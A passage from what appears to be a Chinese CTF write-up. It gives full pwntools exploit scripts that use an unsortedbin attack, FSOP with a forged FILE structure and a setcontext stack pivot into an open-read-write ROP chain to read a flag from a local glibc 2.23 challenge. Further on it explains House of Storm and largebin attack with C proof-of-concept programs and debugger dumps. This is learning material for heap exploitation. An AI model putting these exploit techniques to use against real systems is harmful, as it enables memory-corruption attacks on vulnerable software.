success('malloc_hook >> '+hex(malloc_hook))
success('io_list_all >> '+hex(io_list_all))

add(0x428,'a'*0x10)#2
show(2)

p.recvuntil('content:\n')
p.recvuntil('a'*16)
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
heap_base=leak_addr-1344
success('leak_addr >> '+hex(leak_addr))
success('heap_base >> '+hex(heap_base))

pop_rax_ret=libc_base+0x000000000003a738
pop_rdi_ret=libc_base+0x0000000000021112
pop_rsi_ret=libc_base+0x00000000000202f8
pop_rdx_ret=libc_base+0x0000000000001b92
syscall_ret=libc_base+0x00000000000bc3f5

bss_addr=heap_base+0x18
flag_addr=heap_base+3088

# open(flag_addr,0)
orw = p64(pop_rax_ret) + p64(2)
orw += p64(pop_rdi_ret) + p64(flag_addr)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rdx_ret) + p64(0)
orw += p64(syscall_ret)
# read(3,bss_addr,0x60)
orw += p64(pop_rax_ret) + p64(0)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rsi_ret) + p64(bss_addr)
orw += p64(pop_rdx_ret) + p64(0x60)
orw += p64(syscall_ret)
# write(1,bss_addr,0x60)
orw += p64(pop_rax_ret) + p64(1)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(pop_rsi_ret) + p64(bss_addr)
orw += p64(pop_rdx_ret) + p64(0x60)
orw += p64(syscall_ret)

fake_file = '/bin/sh\x00'+p64(0x61)
fake_file += p64(0)+p64(io_list_all-0x10)
fake_file += p64(0) + p64(1)
fake_file = fake_file.ljust(0xc0,'\x00')
fake_file += p64(0) * 3
fake_file += p64(heap_base+1360) # 这里指向 orw_addr-24 的位置

payload=p64(0)*3 + orw

payload= payload.ljust(0x420-0x10,'\x00')
payload= payload + fake_file

delete(2)
add(0x410,'aaaa')#3

edit(0,payload) # 确保此时unsortedbin中只有目标chunk

p.sendlineafter('> ',str(1))
p.sendlineafter('size:\n',str(1040))

p.interactive()

先说一下我的思路吧:

  • 我先想到了 house of orange 后半节的 FSOP 攻击,于是进行了模仿
  • 用 unsortedbin attack 在 io_list_all 上写入 main_arena + 88
  • 在利用堆风水,成功构造出 heap overlappling,改写 unsorted chunk-> size 为“0x61”
  • 那么程序就将会把 unsorted chunk 识别为 small chunk,并且会把其当做 FILE 结构体
  • 接下来就在 fake small chunk 中伪造 FILE 结构体,把 vtable 字段写入 ORW 的地址

需要注意的地方:

  • 堆风水是关键,需要先申请一个大chunk,释放掉,然后再次申请它(这次申请的size要小一些),这样就可以造成堆溢出
  • 其次就是伪造 FILE 结构体的时候,需要保证 unsortedbin 中只有一个chunk(这个chunk将会被修改“size”),不然就会报错
  • 当成功劫持 io_list_all 后,会执行 fake vtable 中的 _IO_OVERFLOW(详情请了解FSOP),可以把它覆盖为我们需要执行的任何函数,而它会把“fake small chunk-> presize”当成它的第一个参数(我直接在这里写上了“/bin/sh”)

但这个exp有很明显的问题:

  • ORW链是写在堆上的,根本控制不了栈上的数据(我当时竟然没有发现?!)

接下来就需要利用 setcontext 来控制 RSP 了,先看看 setcontext 的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
.text:0000000000047B40 ; __unwind {
.text:0000000000047B40 push rdi
.text:0000000000047B41 lea rsi, [rdi+128h] ; nset
.text:0000000000047B48 xor edx, edx ; oset
.text:0000000000047B4A mov edi, 2 ; how
.text:0000000000047B4F mov r10d, 8 ; sigsetsize
.text:0000000000047B55 mov eax, 0Eh
.text:0000000000047B5A syscall ; LINUX - sys_rt_sigprocmask
.text:0000000000047B5C pop rdi
.text:0000000000047B5D cmp rax, 0FFFFFFFFFFFFF001h
.text:0000000000047B63 jnb short loc_47BC0
.text:0000000000047B65 mov rcx, [rdi+0E0h]
.text:0000000000047B6C fldenv byte ptr [rcx]
.text:0000000000047B6E ldmxcsr dword ptr [rdi+1C0h]
.text:0000000000047B75 mov rsp, [rdi+0A0h] // target
.text:0000000000047B7C mov rbx, [rdi+80h]
.text:0000000000047B83 mov rbp, [rdi+78h]
.text:0000000000047B87 mov r12, [rdi+48h]
.text:0000000000047B8B mov r13, [rdi+50h]
.text:0000000000047B8F mov r14, [rdi+58h]
.text:0000000000047B93 mov r15, [rdi+60h]
.text:0000000000047B97 mov rcx, [rdi+0A8h]
.text:0000000000047B9E push rcx
.text:0000000000047B9F mov rsi, [rdi+70h]
.text:0000000000047BA3 mov rdx, [rdi+88h]
.text:0000000000047BAA mov rcx, [rdi+98h]
.text:0000000000047BB1 mov r8, [rdi+28h]
.text:0000000000047BB5 mov r9, [rdi+30h]
.text:0000000000047BB9 mov rdi, [rdi+68h]
.text:0000000000047BB9 ; } // starts at 47B40
.text:0000000000047BBD ; __unwind {
.text:0000000000047BBD xor eax, eax
.text:0000000000047BBF retn

注意这一句:

1
mov     rsp, [rdi+0A0h]

发现这个函数可以根据 rdi 来控制 rsp ,而 rdi 可以被我们控制

但也需要注意这两句:

1
2
.text:0000000000047B97                 mov     rcx, [rdi+0A8h]
.text:0000000000047B9E push rcx

这个 push 会扰乱我们的ROP链,把 rcx 作为新的栈顶(这里坑了我好多次)

不多说了,先看看代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
from pwn import *

p=process('./chall')
libc=ELF('./libc-2.23.so')
elf=ELF('./chall')

#context.log_level = 'debug'
context.arch = "amd64"

def add(size,content): # 0x410 ~ 0xa9be
p.sendlineafter('> ',str(1))
p.sendlineafter('size:\n',str(size))
p.sendafter('content:\n',content)

def delete(index):
p.sendlineafter('> ',str(2))
p.sendlineafter('which chunk you want to delete?\n',str(index))

def edit(index,content):
p.sendlineafter('> ',str(3))
p.sendlineafter('which chunk you want to edit?\n',str(index))
p.sendafter('content:\n',content)

def show(index):
p.sendlineafter('> ',str(4))
p.sendlineafter('which chunk you want to show?\n',str(index))

#gdb.attach(p)
add(0x6b0,'hehehehe')#0
add(0x428,'./flag\x00')#1
delete(0)

show(0)
p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

main_arena=libc_base+3952488
system_libc=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
io_list_all=libc_base+libc.sym['_IO_list_all']
setcontext=libc_base+libc.sym['setcontext']
one_gadget_list=[0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget=one_gadget_list[2]+libc_base
success('free_hook >> '+hex(free_hook))
success('malloc_hook >> '+hex(malloc_hook))
success('io_list_all >> '+hex(io_list_all))
success('setcontext >> '+hex(setcontext))

add(0x428,'a'*0x10)#2
show(2)

p.recvuntil('content:\n')
p.recvuntil('a'*16)
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
heap_base=leak_addr-1344
success('leak_addr >> '+hex(leak_addr))
success('heap_base >> '+hex(heap_base))

pop_rax_ret=libc_base+0x000000000003a738
pop_rdi_ret=libc_base+0x0000000000021112
pop_rsi_ret=libc_base+0x00000000000202f8
pop_rdx_ret=libc_base+0x0000000000001b92
syscall_ret=libc_base+0x00000000000bc3f5

bss_addr=heap_base+0x18
flag_addr=heap_base+3088
orw_addr=heap_base+1392

# open(flag_addr,0)
orw = p64(pop_rax_ret) + p64(2)
orw += p64(pop_rdi_ret) + p64(flag_addr)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rdx_ret) + p64(0)
orw += p64(syscall_ret)
# read(3,bss_addr,0x60)
orw += p64(pop_rax_ret) + p64(0)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rsi_ret) + p64(bss_addr)
orw += p64(pop_rdx_ret) + p64(0x60)
orw += p64(syscall_ret)
# write(1,bss_addr,0x60)
orw += p64(pop_rax_ret) + p64(1)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(pop_rsi_ret) + p64(bss_addr)
orw += p64(pop_rdx_ret) + p64(0x60)
orw += p64(syscall_ret)

frame_rsp=orw_addr+8
frame_rcx=pop_rax_ret
frame = p64(frame_rsp) #rdi+0xA0
frame += p64(frame_rcx) #rdi+0xA8

fake_file = '/bin/sh\x00'+p64(0x61)
fake_file += p64(0)+p64(io_list_all-0x10)
fake_file += p64(0) + p64(1)
fake_file = fake_file.ljust(0xa0,'\x00')
fake_file += p64(frame_rsp) #rdi+0xA0
fake_file += p64(frame_rcx) #rdi+0xA8
fake_file = fake_file.ljust(0xc0,'\x00')
fake_file += p64(0) * 3
fake_file += p64(heap_base+1360)

payload=p64(0)*3 + p64(setcontext+53) + orw
payload= payload.ljust(0x420-0x10,'\x00')
payload= payload+fake_file

delete(2)
add(0x410,'aaaa')#3
edit(0,payload)

p.sendlineafter('> ',str(1))
p.sendlineafter('size:\n',str(1040))

p.interactive()

这里说明一下 setcontext 的使用:

这里我选择把 setcontext 写入 fake vtable->_IO_OVERFLOW 中 ,执行 setcontext 时,rdi 寄存器就会指向“fake small chunk-> presize”所在的地址,而我提前在 rdi+0xa0rdi+0xa8 的位置布置好 fake rspfake rcx

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
pwndbg> telescope 0x55b7807e5960
00:00000x55b7807e5960 ◂— 0x68732f6e69622f /* '/bin/sh' */
01:00080x55b7807e5968 ◂— 0x61 /* 'a' */
02:00100x55b7807e5970 ◂— 0x0
03:00180x55b7807e5978 —▸ 0x7f11a54eb510 ◂— 0x0
04:00200x55b7807e5980 ◂— 0x0
05:00280x55b7807e5988 ◂— 0x1
06:00300x55b7807e5990 ◂— 0x0
07:00380x55b7807e5998 ◂— 0x0
08:00400x55b7807e59a0 ◂— 0x0
... ↓ 7 skipped
10:00800x55b7807e59e0 ◂— 0x0
... ↓ 3 skipped
14:00a0│ 0x55b7807e5a00 —▸ 0x55b7807e5578 ◂— 0x2 // rdi+0xa0
15:00a8│ 0x55b7807e5a08 —▸ 0x7f11a5160738 (mblen+104) ◂— pop rax // rdi+0xa8
16:00b0│ 0x55b7807e5a10 ◂— 0x0
17:00b8│ 0x55b7807e5a18 ◂— 0x0
18:00c0│ 0x55b7807e5a20 ◂— 0x0
... ↓ 2 skipped
1b:00d8│ 0x55b7807e5a38 —▸ 0x55b7807e5550 ◂— 0x0 // fake vtable addr
1
2
3
4
5
6
7
8
9
10
11
pwndbg> telescope 0x55b7807e5550 // fake vtable addr
00:00000x55b7807e5550 ◂— 0x0
... ↓ 2 skipped
03:00180x55b7807e5568 —▸ 0x7f11a516db85 (setcontext+53) ◂— mov rsp, qword ptr [rdi + 0xa0] // fake vtable -> _IO_OVERFLOW
04:00200x55b7807e5570 —▸ 0x7f11a5160738 (mblen+104) ◂— pop rax
05:00280x55b7807e5578 ◂— 0x2
06:00300x55b7807e5580 —▸ 0x7f11a5147112 (iconv+194) ◂— pop rdi
07:00380x55b7807e5588 —▸ 0x55b7807e5c10 ◂— 0x67616c662f2e /* './flag' */
08:00400x55b7807e5590 —▸ 0x7f11a51462f8 (init_cacheinfo+40) ◂— pop rsi
09:00480x55b7807e5598 ◂— 0x0
0a:00500x55b7807e55a0 —▸ 0x7f11a5127b92 ◂— pop rdx

现在 rsp 将会指向 fake vtable -> _IO_OVERFLOW(ORW的头部),之后就可以顺利读出 flag 了


小结

这个题目花了我很长的时间,我也学习到了 FSOP,堆上ORW,甚至是 House Of Storm(虽然没有成功)

在进行 FSOP 时,我的堆布局前前后后被改了十几次,因为这是我第一次尝试 FSOP 没有什么经验,所以我所有的操作都是以 House Of Orange 为模板进行修改的,当时很苦恼,因为报错了也不知道原因,只能盲目的模仿,好在最后还是模仿出来了

进行FSOP攻击后,我可以执行libc中的函数,但就是执行不了我的ORW链,后来发现我把ORW链写在堆中,需要栈迁移来调整栈空间,最后在学长的帮助下我了解到了 setcontext 函数,分析其源码过后,成功利用它执行了ORW链

PS:其实最开始我以为这题需要用到 largebin attack 的知识(比如:House Of Storm),所以我也去学了一下

House Of Storm

House Of Storm 是一种结合了 unsortedbin attackLargebin attack 的攻击技术,其基本原理和 Largebin attack 类似

House Of Storm 可以在任意地址写出chunk地址,进而把这个地址的高位当作size,可以进行任意地址分配chunk,也就是可以造成任意地址写的后果,危害十分之大,但是其条件也是非常的苛刻


House Of Storm 利用姿势

House Of Storm 利用条件:

  • libc版本小于libc-2.30(因为libc-2.30之后加入了检查)
  • 需要攻击者在 largebinunsortedbin 中分别布置一个chunk,这两个chunk需要在归位之后处于同一个 largebin 的index中,且 unsortedbin 中的chunk要比 largebin 中的大
  • 需要 unsorted_bin 中的 bk指针 可控
  • 需要 largebin 中的 bk指针和bk_nextsize 指针可控

相较于 Largebin attack 来说,攻击需要的条件多出了一条 “unsorted bin中的bk指针可控” ,但是基本上程序如果 Largebin attack 条件满足,基本代表存在UAF漏洞,那么多控制一个bk指针应该也不是什么难事

House Of Storm 利用姿势:

  • 利用 large bin attack 分别错位写一个size和bk的地址,size错位写了0x56(由于pie的原因,chunk的地址总是为6字节,但是头部地址可能是0x55或者0x56,这里需要0x56才能成功,因为malloc后会进行检测)
  • 以下检测需要满足的要求,只需满足一条即可:
1
2
3
4
assert(!victim || chunk_is_mmapped(mem2chunk(victim)) || ar_ptr == arena_for_chunk(mem2chunk(victim)));
/* 1. victim 为 0 */
/* 2. IS_MMAPPED 为 1 */
/* 3. NON_MAIN_ARENA 为 0 */
  • 利用 unsorted bin attack 在FD的位置写一个main_arena + 88的地址,从而绕过了检测

House Of Storm 从根本上也是写堆地址,但是攻击者可以利用巧妙的构造 把这个堆地址伪造成size字段 ,基于这个size字段,就可以展开 unsortedbin attack 了

伪造案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
struct {
unsigned long presize;
unsigned long size;
unsigned long fd;
unsigned long bk;
unsigned long fd_nextsize;
unsigned long bk_nextsize;
}chunk;

int main()
{
unsigned long *large_chunk,*unsorted_chunk;
unsigned long *fake_chunk = (unsigned long *)&chunk;
char *ptr;

unsorted_chunk=malloc(0x418);
malloc(0X20);
large_chunk=malloc(0x408);
malloc(0x20);

free(large_chunk);
free(unsorted_chunk);
unsorted_chunk=malloc(0x418); //large_chunk归位
free(unsorted_chunk); // unsorted_chunk归位

unsorted_chunk[1] = (unsigned long )fake_chunk;
large_chunk[1] = (unsigned long )fake_chunk+8;
large_chunk[3] = (unsigned long )fake_chunk-0x18-5;

ptr=malloc(0x48);
strncpy(ptr, "/bin/sh\x00", 0x10);
system(((char *)fake_chunk + 0x10));

return 0;
}
1
2
3
4
5
6
7
➜  桌面 ./test
[1] 5082 segmentation fault ./test
➜ 桌面 ./test
[1] 5088 segmentation fault ./test
➜ 桌面 ./test
$ whoami
yhellow

接下来进行单步调试:

  • 基本操作执行完毕后:
1
2
3
4
unsortedbin
all: 0x55555555a000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x55555555a000
largebins
0x400: 0x55555555a450 —▸ 0x7ffff7dd1f68 (main_arena+1096) ◂— 0x55555555a450
  • 看一下“unsorted_chunk”和“large_chunk”中的数据:
1
2
3
4
pwndbg> x/20xg 0x55555555a000 /* unsorted_chunk */
0x55555555a000: 0x0000000000000000 0x0000000000000421
0x55555555a010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 /* main_arena */
0x55555555a020: 0x0000000000000000 0x0000000000000000
1
2
3
4
5
pwndbg> x/20xg 0x55555555a450 /* large_chunk */
0x55555555a450: 0x0000000000000000 0x0000000000000411
0x55555555a460: 0x00007ffff7dd1f68 0x00007ffff7dd1f68 /* main_arena */
0x55555555a470: 0x000055555555a450 0x000055555555a450 /* large_chunk(指向自身) */
0x55555555a480: 0x0000000000000000 0x0000000000000000
  • 修改完成后:
1
2
3
4
pwndbg> x/20xg 0x55555555a000 /* unsorted_chunk */
0x55555555a000: 0x0000000000000000 0x0000000000000421
0x55555555a010: 0x00007ffff7dd1b78 0x0000555555558040 /* fake_chunk */
0x55555555a020: 0x0000000000000000 0x0000000000000000
1
2
3
4
5
pwndbg> x/20xg 0x55555555a450 /* large_chunk */
0x55555555a450: 0x0000000000000000 0x0000000000000411
0x55555555a460: 0x00007ffff7dd1f68 0x0000555555558048 /* fake_chunk+8 */
0x55555555a470: 0x000055555555a450 0x0000555555558023 /* fake_chunk-0x18-5 */
0x55555555a480: 0x0000000000000000 0x0000000000000000
1
2
3
4
5
6
7
8
unsortedbin
all [corrupted] /* GDB显示出错了 */
FD: 0x55555555a000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x55555555a000
BK: 0x55555555a000 —▸ 0x555555558040 (chunk) ◂— 0x0 /* fake_chunk */
largebins
0x400 [corrupted]
FD: 0x55555555a450 —▸ 0x7ffff7dd1f68 (main_arena+1096) ◂— 0x55555555a450
BK: 0x55555555a450 —▸ 0x555555558048 (chunk+8) ◂— 0x0
  • 发现 fake_chunk 被链入 unsortedbin ,而且是第一个
  • 正常申请是肯定会报错的,因为程序从 unsortedbin 中申请 fake_chunk 时通不过检查

但是程序却可能不报错,为什么会这样呢?这一点需要在源码中查看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
/* fwd => 最终为victim的上一个chunk(其实就是largebin chunk)*/
/* bck => 最终为victim的下一个chunk */
/* victim => 即将进入largebin的unsortedbin chunk */

/* fwd->bk => fake_chunk+8 */
/* fwd->bk_nextsize => fake_chunk-0x18-5 */

else /* victim将成为新的纵向链表头 */
{
victim->fd_nextsize = fwd;
/* unsorted_bin->fd_nextsize=large_bin */
victim->bk_nextsize = fwd->bk_nextsize;
/* unsorted_bin->bk_nextsize=fake_chunk-0x18-5 */
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
/* (fake_chunk-0x18-5)=unsorted_bin */
victim->bk_nextsize->fd_nextsize = victim;
/* (fake_chunk-0x18-5)+0x18=victim */
}
bck = fwd->bk;
/* bck=fake_chunk+8 */
if (bck->fd != fwd)
malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
}
......
mark_bin (av, victim_index);

victim->bk=bck;
/* unsorted_bin->bk=fake_chunk+8 */
victim->fd = fwd;
/* unsorted_bin->fd=large_bin */
fwd->bk = victim;
/* fake_chunk+8=victim */
bck->fd = victim;
/* (fake_chunk+8)-8=victim */

其实这就是 largebin attack 的作用了,最关键的一步是:

1
2
    victim->bk_nextsize->fd_nextsize = victim;
/* (fake_chunk-0x18-5)+0x18=victim */

其实就是在 fake_chunk-5 中写入了 victim

  • 如果在程序开启PIE的情况下,堆地址的开头通常是0x55或者0x56开头,且我们的堆地址永远都是6个字节,减去5个字节,剩下的就是0x55(或0x56)了
  • 如果提前5个字节开始写堆地址,那么伪造在 size字段 上面的就正好是0x55

也就是说,链入 unsortedbin 的 fake_chunk 的 size字段 是可能为0x56的,而0x56刚好可以通过 unsortedbin 的检查(注意:size字段 如果为“0x55”,那么P位就是“1”,通不过检查)

接下来程序就会申请到 fake_chunk ,然后在其中写入“/bin/sh”,作为system的参数

版本对 House Of Storm 的影响

libc-2.30

1
2
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");

有点类似于 unlink 的检查(检查目标chunk的上一个chunk的下一个chunk,是不是目标chunk)

由于 House Of Storm 会修改 fwd->bk_nextsize ,所以检查不通过,导致 House Of Storm 失效

Ptmalloc算法:Largebin Attack

Large Bin Attack 是一种较为困难的攻击方式,他对攻击的条件要求较多,实现也较为复杂,通常和 Unsorted Bin 打配合来实现 house of storm,来达到提升影响力的作用

  • libc-2.29 及以下版本,可以利用 Large Bin Attack 来写两个地址
  • libc-2.30 及以上版本中,只能利用 Large Bin Attack 来写一个地址

Large bin

大于512(1024)字节的 chunk 称之为 large chunk,large bin 就是用于管理这些 large chunk 的

largebin 采用双链表结构,里面的 chunk 从头结点的 fd 指针开始,按大小顺序进行排列

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
This struct declaration is misleading (but accurate and necessary).
It declares a "view" into memory allowing access to necessary
fields at known offsets from a given base. See explanation below.
*/
struct malloc_chunk {
INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};

这个结构中的 fd_nextsizebk_nextsize 来链接到下一个 size 的堆块头部和上一个 size 的堆块头部,然后在相同 size 的堆块内部再通过 fdbk 来进行内部的管理

  • fd_nextsizebk_nextsize 链接的链表为横向链表,用 fdbk 链接的链表为纵向链表

在横向链表中,堆管理器维护一个循环的单调链表,由最大的 size(在这个 index 下的最大 size)作为表头,最小的 size 作为表尾,且首尾相连

largebin 基础知识:

  • largebin 中一共包括 63 个 bin,index为64~126,每个 bin 中的 chunk 的大小不一致,而是处于一定区间范围内
  • largebin 的结构和其他链表都不相同,更加复杂
  • largebin 里除了有 fd,bk 指针,另外还有 fd_nextsize 和 bk_nextsize 这两个指针
  • largebin 的插入顺序不再是LIFO或FIFO,而是一种全新的方式

largebin 特性:

  • 按照大小从大到小排序,若大小相同,按照 free 时间排序
  • 若干个大小相同的堆块,只有首堆块的 fd_nextsizebk_nextsize 会指向其他堆块,后面的堆块的 fd_nextsizebk_nextsize 均为 “0”
  • size 最大的chunk的 bk_nextsize 指向最小的 chunk,size 最小的 chunk 的 fd_nextsize 指向最大的 chunk

下面的代码将解释 largebin 的插入顺序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
if (in_smallbin_range(size)) /* smallbin(暂时不管) */
{
victim_index = smallbin_index(size);//获取size对应的smallbin的index
bck = bin_at(av, victim_index);//bck指向size对应的smallbin的链表头
//fwd指向size对应的smallbin的链表中的新加入的chunk(small bin使用头插法)
fwd = bck->fd;
}
else /* largebin(核心) */
{
/*
victim => 需要插入的目标chunk
fwd => 最终为victim的上一个chunk(可以定位victim)
bck => 最终为victim的下一个chunk(可以定位victim)
*/

victim_index = largebin_index(size); /* 获取size对应的largebin的index */
bck = bin_at(av, victim_index);
fwd = bck->fd;
/*
fwd => 最大的chunk(对应链表头中的第一个chunk)
bck => 对应的largebin的链表头
bck->fd => 对应largebin中最大的chunk(并且是第一个chunk)
bck->bk => 对应largebin中最小的chunk(并且是最后一个chunk)
*/

//如果largebin非空,在largbin进行按顺序插入
if (fwd != bck) {
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
assert((bck->bk->size & NON_MAIN_ARENA) == 0);//默认不启用assert

if ((unsigned long) (size) < (unsigned long) (bck->bk->size)) {
/*
"bck->bk"指向对应largebin中最小的chunk
如果"size"<"bck->bk->size",那么目标chunk将成为新的最小chunk
因此需要把victim添加到此largebin的尾部
*/

fwd = bck; /* fwd = 原链表头 */
bck = bck->bk; /* bck = 原链表尾(最后一个chunk) */

victim->fd_nextsize = fwd->fd;
/* 在"victim->fd_nextsize"中装入"最大chunk" */
victim->bk_nextsize = fwd->fd->bk_nextsize;
/* 在"victim->bk_nextsize"中装入"原最小chunk" */
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
/* 先把 "victim" 装入 "原最小chunk->fd_nextsize" */
/* 再把 "victim" 装入 "最大chunk->bk_nextsize" */
}
else /* 如果victim不是(不唯一是)largebin中最小的chunk */
{
assert((fwd->size & NON_MAIN_ARENA) == 0);//默认不启用assert
//从大到小(从头到尾)找到合适的位置
while ((unsigned long) size < fwd->size) {
fwd = fwd->fd_nextsize; /* 不断更新fwd,直到"size">="fwd->size" */
assert((fwd->size & NON_MAIN_ARENA) == 0);
}

if ((unsigned long) size == (unsigned long) fwd->size)
/* 如果size刚好相等,就直接插入对应纵向列表的头部 */
fwd = fwd->fd; /* fwd = 对应纵向列表的第一个chunk(跳过了头部) */
else
{
/* 如果size不相等("size">"fwd->size"),就把victim加入到新的纵向链表 */
/* fwd = 新纵向列表的头部 */

victim->fd_nextsize = fwd;
/* 在"victim->fd_nextsize"中装入"对应size小于victim的纵向链表" */
victim->bk_nextsize = fwd->bk_nextsize;
/* 在"victim->bk_nextsize"中装入"对应size大于victim的纵向链表" */
fwd->bk_nextsize = victim;
/* 在"纵向链表(小于victim)->bk_nextsize"中装入"victim" */
victim->bk_nextsize->fd_nextsize = victim;
/* 在"纵向链表(大于victim)->fd_nextsize"中装入"victim" */
}
bck = fwd->bk; /* bck = 当前fwd的上一个chunk*/
}
}
else //如果largebin为空,将victim加入到纵向列表
victim->fd_nextsize = victim->bk_nextsize = victim;
/* 先把 "victim" 装入 "victim->bk_nextsize" */
/* 再把 "victim" 装入 "victim->fd_nextsize" */
}
mark_bin(av, victim_index); //把victim加入到的bin的表示为非空
//把victim加入到large bin的链表中
victim->bk = bck; /* bck = victim对应的下一个chunk */
victim->fd = fwd; /* fwd = victim对应的上一个chunk */
fwd->bk = victim;
bck->fd = victim;

发现以下规律:

  • 在纵向列表外部:对应的largebin从大到小组织各个纵向列表
  • 在纵向列表内部:新加入的chunk直接插头,而位于表头的chunk固定不变(除非其余成员全部被申请)

Large Bin Attack

LargeBin Attack 就发生在堆块中 UnsortedBin 放入 LargeBin 的过程当中去

  • 写入第一个地址:
1
victim->bk_nextsize->fd_nextsize = victim;

如果我们对 victim->bk_nextsize 进行伪造,那么就可以控制程序写一个堆块地址到目标位置

  • 写入第二个地址:
1
bck->fd = victim; /* bck 也就是 fwd->bk */

如果我们可以控制 fwd->bk 位置,那么就可以写一个堆块地址到目标位置

下面就是利用案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

int main()
{

unsigned long stack_var1 = 0;
unsigned long stack_var2 = 0;

fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);

unsigned long *p1 = malloc(0x420);
malloc(0x20); /* 防止合并 */
unsigned long *p2 = malloc(0x500);
malloc(0x20);
unsigned long *p3 = malloc(0x500);
malloc(0x20);

free(p1);
free(p2);
malloc(0x90);

free(p3);

p2[-1] = 0x3f1;
p2[0] = 0;
p2[2] = 0;
p2[1] = (unsigned long)(&stack_var1 - 2); /* long 在64位机器上时8字节 */
p2[3] = (unsigned long)(&stack_var2 - 4);

malloc(0x90);

fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);

return 0;
}
1
2
3
4
5
6
➜  桌面 ./test 
stack_var1 (0x7fffc5efda80): 0
stack_var2 (0x7fffc5efda88): 0

stack_var1 (0x7fffc5efda80): 0x55ea64ab09a0
stack_var2 (0x7fffc5efda88): 0x55ea64ab09a0

可以发现:两个栈地址上被写入了数据,接下来就看看具体的执行过程

“p1”和“p2”刚刚释放时:

1
2
3
unsortedbin
all: 0x55555555a360 —▸ 0x55555555a000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x55555555a360
/* p2 -> p1 -> main_arena */

不出意料的都放入了 unsortedbin ,接下来再进行申请时,ptmalloc就会根据“size”把目标chunk放入对应的bins中:

1
2
3
4
5
6
unsortedbin
all: 0x55555555a0a0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x55555555a0a0
/* p1(分割后) -> main_arena */
largebins
0x500: 0x55555555a360 —▸ 0x7ffff7dd1fa8 (main_arena+1160) ◂— 0x55555555a360
/* 遍历到p1时就满足了分割的条件(从后往前),所以p1被分割,p2则放入了largebins */

接下来释放p3,然后修改p2:

1
2
3
unsortedbin
all: 0x55555555a8a0 —▸ 0x55555555a0a0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x55555555a8a0
/* p3 -> p1(分割后) -> main_arena */
  • 修改前:
1
2
3
4
pwndbg> x/20xg 0x55555555a360
0x55555555a360: 0x0000000000000000 0x0000000000000511
0x55555555a370: 0x00007ffff7dd1fa8 0x00007ffff7dd1fa8
0x55555555a380: 0x000055555555a360 0x000055555555a360
1
2
00:0000│ rsp 0x7fffffffdf10 ◂— 0x0 // stack_var1
01:00080x7fffffffdf18 ◂— 0x0 // stack_var2
  • 修改后:
1
2
3
4
pwndbg> x/20xg 0x55555555a360
0x55555555a360: 0x0000000000000000 0x00000000000003f1
0x55555555a370: 0x0000000000000000 0x00007fffffffdf00 // stack_var1 - 2
0x55555555a380: 0x0000000000000000 0x00007fffffffdef8 // stack_var2 - 4
1
2
